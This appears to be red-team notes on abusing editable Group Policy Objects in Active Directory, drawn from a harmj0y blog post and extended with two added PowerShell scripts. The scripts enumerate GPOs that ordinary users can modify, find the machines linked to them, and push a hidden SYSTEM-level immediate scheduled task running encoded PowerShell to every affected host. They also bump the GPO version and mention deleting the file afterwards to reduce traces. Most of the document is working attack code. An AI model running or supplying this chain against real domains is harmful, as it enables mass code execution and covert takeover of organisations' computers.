- Group Policy Objects are Active Directory containers used to store groupings of policy settings. These objects are then linked to specific sites, domains, or most commonly specific organizational units (OUs).
- By default, computer Group Policy is updated in the background every 90 minutes, with a random offset of 0 to 30 minutes.
- In PowerView, the Get-NetGPO cmdlet allows for the easy enumeration of all current GPOs in a given domain. Passing -ComputerName returns the GPOs applied to that particular host:
Get-NetGPO -ComputerName WINDOWS1.testlab.local
- The gpcfilesyspath field shows you where the configuration for the policy resides.
- Let’s enumerate all the permissions for all GPOs in the current domain:
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
- NOTE: you can also use PowerView's Invoke-ACLScanner to speed up your search. This will search the ACLs for ALL domain objects and return results where the IdentityReference's RID is 1000 or above (i.e., a non-default, non-built-in principal) and that principal has some type of modification rights on the given object.
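The enumeration above, carried one step further as an added example (not code from the original post or from PowerView itself): walk every GPO's ACL, keep only entries that grant write-type rights to a principal whose RID is 1000 or above (the same filter Invoke-ACLScanner applies), and resolve each hit to the computers in the OUs the GPO is linked to. It assumes the old PowerView cmdlet names the post uses (Get-NetGPO, Get-ObjectAcl, Get-NetOU, Get-NetComputer) are loaded; the property names come from the ADSI objects those cmdlets return.

```powershell
# Added example, not PowerView's own code. Assumes PowerView (Get-NetGPO,
# Get-ObjectAcl, Get-NetOU, Get-NetComputer) is already imported.

# Rights that let a trustee change the GPO object or its gpcfilesyspath pointer.
$modRights = 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty'

function Find-WritableGPO {
    Get-NetGPO | ForEach-Object {
        $gpo = $_
        Get-ObjectAcl -ResolveGUIDs -Name $gpo.name |
            Where-Object { $_.ActiveDirectoryRights -match $modRights } |
            ForEach-Object {
                $trustee = [string]$_.IdentityReference
                # Get-ObjectAcl usually returns DOMAIN\name; translate to a SID so the
                # RID can be read. Unresolvable SIDs are already in S-1-... form.
                try {
                    if ($trustee -like 'S-1-*') { $sid = $trustee }
                    else {
                        $sid = ([System.Security.Principal.NTAccount]$trustee).Translate(
                                   [System.Security.Principal.SecurityIdentifier]).Value
                    }
                } catch { return }   # skip names that cannot be translated

                # RID < 1000 is a built-in/default principal (Domain Admins = 512,
                # SYSTEM = 18, ...); those rights are expected, not a misconfiguration.
                $rid = [int]($sid.Split('-')[-1])
                if ($rid -lt 1000) { return }

                # OUs the GPO is linked to -> computers that would run anything we push.
                $hosts = Get-NetOU -GUID $gpo.name |
                         ForEach-Object { Get-NetComputer -ADSpath $_ }

                [PSCustomObject]@{
                    GPODisplayName = $gpo.displayname
                    GPOName        = $gpo.name            # the {GUID}
                    GPOPath        = $gpo.gpcfilesyspath  # SYSVOL folder we could write to
                    Trustee        = $trustee
                    Rights         = $_.ActiveDirectoryRights
                    AffectedHosts  = ($hosts -join ',')
                }
            }
    }
}

Find-WritableGPO | Format-List
```

A hit whose AffectedHosts is empty is still worth noting (the GPO may be linked at the domain or site level, which Get-NetOU -GUID does not cover), but a hit with hosts listed is the case the rest of the post exploits.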
- Here’s what a misconfiguration might look like:
- And here’s how that misconfiguration looks through the Group Policy Management console:
- So the TESTLAB\will user has modification rights on the GPO with the GUID of {3EE4BE4E-7397-4433-A9F1-3A5AE2F56EA2} and display name of SecurePolicy. Let's track this back and see what systems this GPO is applied to:
Get-NetOU -GUID "{3EE4BE4E-7397-4433-A9F1-3A5AE2F56EA2}" | %{Get-NetComputer -ADSpath $_}
- With edit rights to the GPO, we can force code execution on these machines!
- My preference for immediate code execution would be to push out an 'Immediate' scheduled task, which runs right away and then removes itself, every time group policy refreshes.
- We need to build a schtask .XML template, substitute in our configuration/commands, and then copy it to <GPO_PATH>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml in the GPO we can edit.
- After waiting 1-2 hours for the group policy refresh cycle, we can remove the .xml to minimize our footprint.
- PowerView's New-GPOImmediateTask function should take care of all this for you. The -TaskName argument is required, -Command specifies the command to run (defaults to powershell.exe), and -CommandArguments specifies the arguments for the given binary:
New-GPOImmediateTask -TaskName Debugging -GPODisplayName SecurePolicy -CommandArguments '-NoP -NonI -W Hidden -Enc JABXAGMAPQBO...' -Force
New-GPOImmediateTask -Remove -Force -GPODisplayName SecurePolicy
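The manual procedure described above (template the ImmediateTaskV2 XML, drop it into the GPO's Machine\Preferences\ScheduledTasks folder, wait for refresh), as an added PowerShell example. This is not PowerView's New-GPOImmediateTask and not code from the original post; it also does the step the bullets leave implicit, which that cmdlet handles for you: clients only re-process a GPO whose version number changed, so GPT.ini and the AD object's versionNumber attribute are incremented and the Scheduled Tasks preference extension GUIDs are registered on the GPO. The GPO path, distinguished name and task command are placeholders; the CLSIDs and extension GUIDs are the fixed ones the Group Policy Preferences Scheduled Tasks extension uses.

```powershell
# Added example (not PowerView's code). Needs write access to the GPO's SYSVOL
# folder and to the GPO object in AD, which is what the ACL above grants.

function New-ImmediateTaskXml {
    param(
        [Parameter(Mandatory)][string]$TaskName,
        [string]$Command = 'powershell.exe',
        [string]$Arguments = ''
    )
    # Escape so quotes/angle brackets in the arguments cannot break the XML.
    $name = [System.Security.SecurityElement]::Escape($TaskName)
    $cmd  = [System.Security.SecurityElement]::Escape($Command)
    $args = [System.Security.SecurityElement]::Escape($Arguments)
    $uid  = '{' + [guid]::NewGuid().ToString().ToUpper() + '}'
    $now  = (Get-Date).ToString('yyyy-MM-dd HH:mm:ss')
    # Runs as SYSTEM on every machine the GPO applies to; Immediate tasks are
    # deleted by the client right after they execute, so no trigger is needed.
@"
<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="$name" image="0" changed="$now" uid="$uid">
    <Properties action="C" name="$name" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.2">
        <RegistrationInfo><Author>NT AUTHORITY\System</Author><Description></Description></RegistrationInfo>
        <Principals><Principal id="Author"><UserId>NT AUTHORITY\System</UserId><RunLevel>HighestAvailable</RunLevel><LogonType>S4U</LogonType></Principal></Principals>
        <Settings><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>true</Hidden><ExecutionTimeLimit>PT1H</ExecutionTimeLimit><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter></Settings>
        <Actions Context="Author"><Exec><Command>$cmd</Command><Arguments>$args</Arguments></Exec></Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
"@
}

function Install-GPOImmediateTask {
    param(
        [Parameter(Mandatory)][string]$GPOPath,   # gpcfilesyspath, e.g. \\testlab.local\SysVol\testlab.local\Policies\{GUID}
        [Parameter(Mandatory)][string]$GPODN,     # distinguishedname of the GPO object
        [Parameter(Mandatory)][string]$TaskName,
        [string]$Command = 'powershell.exe',
        [string]$Arguments = ''
    )
    $dir     = Join-Path $GPOPath 'Machine\Preferences\ScheduledTasks'
    $xmlPath = Join-Path $dir 'ScheduledTasks.xml'
    # Never clobber a legitimate preference file: that is both noisy and breaks real tasks.
    if (Test-Path $xmlPath) { throw "$xmlPath already exists; merge the ImmediateTaskV2 element by hand" }
    New-Item -ItemType Directory -Path $dir -Force | Out-Null
    New-ImmediateTaskXml -TaskName $TaskName -Command $Command -Arguments $Arguments |
        Set-Content -Path $xmlPath -Encoding UTF8

    # GPO version: user version in the high 16 bits, computer version in the low
    # 16 bits. Bumping the low half in GPT.ini and in versionNumber makes clients
    # re-evaluate the computer side on the next refresh.
    $gptIni = Join-Path $GPOPath 'GPT.ini'
    $ini    = Get-Content $gptIni
    $ver    = [int](($ini | Where-Object { $_ -match '^Version=' }) -replace '^Version=', '')
    $newVer = $ver + 1
    $ini -replace '^Version=.*', "Version=$newVer" | Set-Content -Path $gptIni -Encoding ASCII

    $gpo = [ADSI]"LDAP://$GPODN"
    $gpo.Put('versionNumber', $newVer)
    # Scheduled Tasks CSE {AADCED64-...} with its tool extension {CAB54552-...};
    # the {00000000-...} pair is the GPMC "preferences present" marker.
    $cse = 'AADCED64-746C-4633-A97C-D61349046527'
    $ext = "[{00000000-0000-0000-0000-000000000000}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}][{$cse}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]"
    $cur = [string]$gpo.Properties['gPCMachineExtensionNames'].Value
    if (-not $cur)                { $gpo.Put('gPCMachineExtensionNames', $ext) }
    elseif ($cur -notmatch $cse)  { throw "gPCMachineExtensionNames already lists other CSEs ($cur); entries must stay sorted by GUID, merge manually" }
    $gpo.SetInfo()
}

# Usage (placeholders for the GPO found in the ACL enumeration):
# Install-GPOImmediateTask -GPOPath '\\testlab.local\SysVol\testlab.local\Policies\{3EE4BE4E-7397-4433-A9F1-3A5AE2F56EA2}' `
#     -GPODN 'CN={3EE4BE4E-7397-4433-A9F1-3A5AE2F56EA2},CN=Policies,CN=System,DC=testlab,DC=local' `
#     -TaskName Debugging -Arguments '-NoP -NonI -W Hidden -Enc <base64>'
```

Cleanup mirrors the install: delete ScheduledTasks.xml and bump the version once more so clients pick up the removal. Both the SYSVOL write and the versionNumber change are the artifacts a defender can watch for, which is why the post suggests pulling the .xml after one refresh cycle.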
https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/